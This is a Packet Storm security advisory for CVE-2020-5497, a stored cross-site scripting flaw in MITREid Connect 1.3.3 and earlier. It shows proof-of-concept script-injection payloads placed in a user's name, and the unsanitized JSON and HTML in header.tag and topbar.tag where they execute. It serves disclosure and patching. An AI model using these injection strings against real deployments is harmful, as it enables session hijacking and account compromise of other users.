what you don't know can hurt you

MITREid 1.3.3 Cross Site Scripting

MITREid 1.3.3 Cross Site Scripting
Posted Feb 28, 2020
Authored by Aaron Bishop

MITREid versions 1.3.3 and below suffer from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2020-5497
MD5 | 4af01c468a0b4372b4ec0d37a9c3cbb6

MITREid 1.3.3 Cross Site Scripting

Change Mirror Download
MITREid Connect OpenID-Connect-Java-Spring-Server
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server> version
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is
included in *topbar.tag* and *header.tag* without being sanitized. A user
can set their name to a value like:

Test</script><script>alert(1)</script>

Which will be included in JSON used by a JavaScript function in *header.tag*
:

// get the info of the current user, if available (null otherwise)
> function getUserInfo() {
> return {"sub":"12318767","name":"
> *Test</script><script>alert(1)</script>*
> Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"
> test@test.com","email_verified":true};}


A name such as:

Test<script>alert(1)</script>

would also work; it is included in the page when menus are created by
*topbar.tag*:

<!-- use a simplified user button system when collapsed -->
> <ul class="nav hidden-desktop">
> <li><a href="manage/#user/profile">*Test<script>alert(1)</script>*
> Test</a></li>
> <li class="divider"></li>
> <li><a href="" class="logoutLink"><i class="icon-remove"></i> Log
> out</a></li>


This issue has been reported on Github
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521>
with
patches pending.

A write up is available at:
https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close